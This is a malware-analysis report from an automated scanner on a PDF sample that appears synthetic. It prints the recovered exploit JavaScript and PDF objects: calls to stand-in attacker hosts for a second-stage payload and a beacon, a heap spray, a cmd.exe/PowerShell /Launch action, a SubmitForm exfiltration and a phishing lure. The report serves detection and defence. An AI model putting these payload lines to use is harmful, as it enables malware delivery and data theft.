MALICIOUS
546
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 15
-
Launch action critical PDF_LAUNCHPDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
-
/Launch action target: cmd.exe critical PDF_LAUNCH_COMMANDPDF /Launch action specifies an executable target with parameters '/c powershell -enc SQBFAFgA...' — references a known-dangerous executable (cmd, PowerShell, etc.).
-
JavaScript action low 3 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
var s = this.getURL('https://evil-dropper.example.cn/beacon'); eval(unescape('%76%61%72%20%78%3d%31')); endstream -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript issues an HTTP request on open low PDF_JS_NETWORK_BEACONEmbedded JavaScript calls a network API — this.getURL() to an http(s) URL, XMLHttpRequest, or SOAP — typically an open-time beacon / tracking pixel or data-exfil callback. This abuses a legitimate Acrobat API and exploits no vulnerability; the risk is the unsolicited outbound request (confirming recipient open or fetching a next stage).Matched line in script
app.launchURL(url, true); var s = this.getURL('https://evil-dropper.example.cn/beacon'); eval(unescape('%76%61%72%20%78%3d%31')); -
Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOADPDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
-
/Launch action paired with attachment-dropping JS API high PDF_LAUNCH_PLUS_DROPPER_JSPDF combines a /Launch action with a JavaScript API call that writes or opens an attached/external resource — the canonical shape of the CVE-2010-1240 /Launch + exportDataObject family. Benign PDFs do not pair these surfaces; the combination indicates a drop-and-execute chain regardless of the specific JS API knobs or /Launch target.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
SubmitForm action medium PDF_SUBMITFORMPDF has a /SubmitForm action — form data can be silently posted to an attacker-controlled URL
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
-
External URI info PDF_URIPDF contains an external URL action
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://evil-dropper.example.cn/beacon Referenced by PDF JavaScript
- http://exfil-server.example.io/collectReferenced by PDF JavaScript
- https://fake-update.example.top/update.binReferenced by PDF JavaScript
- http://malware-cdn.example.ru/stage2/payload.exeReferenced by PDF JavaScript
- http://185.220.101.45:4444/gate.phpReferenced by PDF JavaScript
- http://awr-d.xml.usae/ala.xReferenced by PDF JavaScript
- http://exfil-server.eReferenced by PDF JavaScript
- http://phishing-login.example.org/verifyReferenced by PDF JavaScript
- http://malicious-site.example.net/click?id=4571Referenced by PDF JavaScript
Extracted artifacts 7
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
invoice_scan.exe |
pdf-embedded-file | PDF EmbeddedFile object 14 at offset 0x7DB | 33 bytes |
SHA-256: db48261aa9d79df258f7bcf0422d851f6f16268be63d1dd652b5456485945cb4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
actual_type=PE; declared_or_context_type=PDF; filename=invoice_scan.exe; kind=pdf-embedded-file
|
|||
javascript_obj0007_000.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x21D | 285 bytes |
SHA-256: 8b10a89507b45af8c9149c03c9c69ce11f6fa4ca5f4ea229bcfd2821e1e271dc |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('%76%61%72%20%78%3d%31'));
|
|||
javascript_obj0013_001.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x6C0 | 141 bytes |
SHA-256: ae3db073be58322bb7f6cbeeebdb7219b19a50f0e820958a6d223defea8941ca |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
|
|||
javascript_obj0007_002.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x23E | 1953 bytes |
SHA-256: 82a2141ba0a11a1b5acb87996b6d1a3a43b2586abd4c34df29aafedd610558a0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 shell/COM execution token(s). Carved artifact contains 4 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('%76%61%72%20%78%3d%31'));
endstream
endobj
8 0 obj
<< /Length 240 >>
stream
BT /F1 10 Tf 50 750 Td (Invoice from billing@evil-corp.example.net) Tj
(Visit http://phishing-login.example.org/verify) Tj
(C2: 103.224.182.250 and backup 91.240.118.172) Tj
(Contact: support@malicious-domain.example.com) Tj ET
endstream
endobj
9 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 612 792] /A << /S /URI /URI (http://malicious-site.example.net/click?id=4571) >> >>
endobj
10 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 100 100] /A << /S /Launch /Win << /F (cmd.exe) /P (/c powershell -enc SQBFAFgA...) >> >> >>
endobj
11 0 obj
<< /Type /Annot /Subtype /Widget /Rect [0 0 50 50] /A << /S /SubmitForm /F (http://exfil-server.example.io/collect) /Flags 4 >> >>
endobj
12 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 50 50] /A << /S /URI /URI (https://fake-update.example.top/update.bin) >> >>
endobj
13 0 obj
<< /Length 200 >>
stream
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
endstream
endobj
14 0 obj
<< /Type /EmbeddedFile /Subtype /application#2Foctet-stream /Length 40 >>
stream
MZ� FAKE_PE_PAYLOAD_DROPPER
endstream
endobj
15 0 obj
<< /Type /Filespec /F (invoice_scan.exe) /EF << /F 14 0 R >> >>
endobj
xref
0 16
0000000000 65535 f
0000000015 00000 n
0000000217 00000 n
0000000276 00000 n
0000000402 00000 n
0000000448 00000 n
0000000495 00000 n
0000000541 00000 n
0000000877 00000 n
0000001155 00000 n
0000001296 00000 n
0000001446 00000 n
0000001593 00000 n
0000001728 00000 n
0000001921 00000 n
0000002062 00000 n
trailer
<< /Size 16 /Root 1 0 R >>
startxref
2142
%%EOF
|
|||
javascript_obj0013_003.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x6E2 | 765 bytes |
SHA-256: 7415c8b268f11d45cb402d944cc18e06814a498c0acfddfc8a74c88ccf04774f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
endstream
endobj
14 0 obj
<< /Type /EmbeddedFile /Subtype /application#2Foctet-stream /Length 40 >>
stream
MZ� FAKE_PE_PAYLOAD_DROPPER
endstream
endobj
15 0 obj
<< /Type /Filespec /F (invoice_scan.exe) /EF << /F 14 0 R >> >>
endobj
xref
0 16
0000000000 65535 f
0000000015 00000 n
0000000217 00000 n
0000000276 00000 n
0000000402 00000 n
0000000448 00000 n
0000000495 00000 n
0000000541 00000 n
0000000877 00000 n
0000001155 00000 n
0000001296 00000 n
0000001446 00000 n
0000001593 00000 n
0000001728 00000 n
0000001921 00000 n
0000002062 00000 n
trailer
<< /Size 16 /Root 1 0 R >>
startxref
2142
%%EOF
|
|||
embedded_pdf_script_00000579.bin |
pdf-embedded-script | PDF decompressed stream script payload at offset 0x579 | 2525 bytes |
SHA-256: 245dbb288d497ba7561712e11bdada70ed38360d6c6434522c48483f1affcad7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 shell/COM execution token(s). Carved artifact contains 4 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
%PDF-1.7
%����
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R /AA << /WillClose 5 0 R /WC 5 0 R >> /Names << /JavaScript << /Names [ (init) 6 0 R ] >> >> /OpenAction << /S /JavaScript /JS 7 0 R >> >>
endobj
2 0 obj
<< /Type /Pages /Kids [ 3 0 R ] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 8 0 R /Annots [ 9 0 R 10 0 R 11 0 R 12 0 R ] >>
endobj
4 0 obj
<< /S /JavaScript /JS 7 0 R >>
endobj
5 0 obj
<< /S /JavaScript /JS 13 0 R >>
endobj
6 0 obj
<< /S /JavaScript /JS 7 0 R >>
endobj
7 0 obj
<< /Length 320 >>
stream
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('%76%61%72%20%78%3d%31'));
endstream
endobj
8 0 obj
<< /Length 240 >>
stream
BT /F1 10 Tf 50 750 Td (Invoice from billing@evil-corp.example.net) Tj
(Visit http://phishing-login.example.org/verify) Tj
(C2: 103.224.182.250 and backup 91.240.118.172) Tj
(Contact: support@malicious-domain.example.com) Tj ET
endstream
endobj
9 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 612 792] /A << /S /URI /URI (http://malicious-site.example.net/click?id=4571) >> >>
endobj
10 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 100 100] /A << /S /Launch /Win << /F (cmd.exe) /P (/c powershell -enc SQBFAFgA...) >> >> >>
endobj
11 0 obj
<< /Type /Annot /Subtype /Widget /Rect [0 0 50 50] /A << /S /SubmitForm /F (http://exfil-server.example.io/collect) /Flags 4 >> >>
endobj
12 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 50 50] /A << /S /URI /URI (https://fake-update.example.top/update.bin) >> >>
endobj
13 0 obj
<< /Length 200 >>
stream
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
endstream
endobj
14 0 obj
<< /Type /EmbeddedFile /Subtype /application/octet-stream /Length 40 >>
stream
MZ� FAKE_PE_PAYLOAD_DROPPER
endstream
endobj
15 0 obj
<< /Type /Filespec /F (invoice_scan.exe) /EF << /F 14 0 R >> >>
endobj
xref
0 16
0000000000 65535 f
0000000015 00000 n
0000000217 00000 n
0000000276 00000 n
0000000402 00000 n
0000000448 00000 n
0000000495 00000 n
0000000541 00000 n
0000000877 00000 n
0000001155 00000 n
0000001296 00000 n
0000001446 00000 n
0000001593 00000 n
0000001728 00000 n
0000001921 00000 n
0000002062 00000 n
trailer
<< /Size 16 /Root 1 0 R >>
startxref
2142
%%EOF
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery percent-decode from combined JavaScript objects at offset 0x21D | 3119 bytes |
SHA-256: 60b94312accdb85fc15e209533233f1328568cfaa8fbb909e25b65ee26c6c504 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 shell/COM execution token(s). Carved artifact contains 9 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('var x=1'));
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('var x=1'));
endstream
endobj
8 0 obj
<< /Length 240 >>
stream
BT /F1 10 Tf 50 750 Td (Invoice from billing@evil-corp.example.net) Tj
(Visit http://phishing-login.example.org/verify) Tj
(C2: 103.224.182.250 and backup 91.240.118.172) Tj
(Contact: support@malicious-domain.example.com) Tj ET
endstream
endobj
9 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 612 792] /A << /S /URI /URI (http://malicious-site.example.net/click?id=4571) >> >>
endobj
10 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 100 100] /A << /S /Launch /Win << /F (cmd.exe) /P (/c powershell -enc SQBFAFgA...) >> >> >>
endobj
11 0 obj
<< /Type /Annot /Subtype /Widget /Rect [0 0 50 50] /A << /S /SubmitForm /F (http://exfil-server.example.io/collect) /Flags 4 >> >>
endobj
12 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 50 50] /A << /S /URI /URI (https://fake-update.example.top/update.bin) >> >>
endobj
13 0 obj
<< /Length 200 >>
stream
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
endstream
endobj
14 0 obj
<< /Type /EmbeddedFile /Subtype /application#2Foctet-stream /Length 40 >>
stream
MZ� FAKE_PE_PAYLOAD_DROPPER
endstream
endobj
15 0 obj
<< /Type /Filespec /F (invoice_scan.exe) /EF << /F 14 0 R >> >>
endobj
xref
0 16
0000000000 65535 f
0000000015 00000 n
0000000217 00000 n
0000000276 00000 n
0000000402 00000 n
0000000448 00000 n
0000000495 00000 n
0000000541 00000 n
0000000877 00000 n
0000001155 00000 n
0000001296 00000 n
0000001446 00000 n
0000001593 00000 n
0000001728 00000 n
0000001921 00000 n
0000002062 00000 n
trailer
<< /Size 16 /Root 1 0 R >>
startxref
2142
%%EOF
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
endstream
endobj
14 0 obj
<< /Type /EmbeddedFile /Subtype /application#2Foctet-stream /Length 40 >>
stream
MZ� FAKE_PE_PAYLOAD_DROPPER
endstream
endobj
15 0 obj
<< /Type /Filespec /F (invoice_scan.exe) /EF << /F 14 0 R >> >>
endobj
xref
0 16
0000000000 65535 f
0000000015 00000 n
0000000217 00000 n
0000000276 00000 n
0000000402 00000 n
0000000448 00000 n
0000000495 00000 n
0000000541 00000 n
0000000877 00000 n
0000001155 00000 n
0000001296 00000 n
0000001446 00000 n
0000001593 00000 n
0000001728 00000 n
0000001921 00000 n
0000002062 00000 n
trailer
<< /Size 16 /Root 1 0 R >>
startxref
2142
%%EOF
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.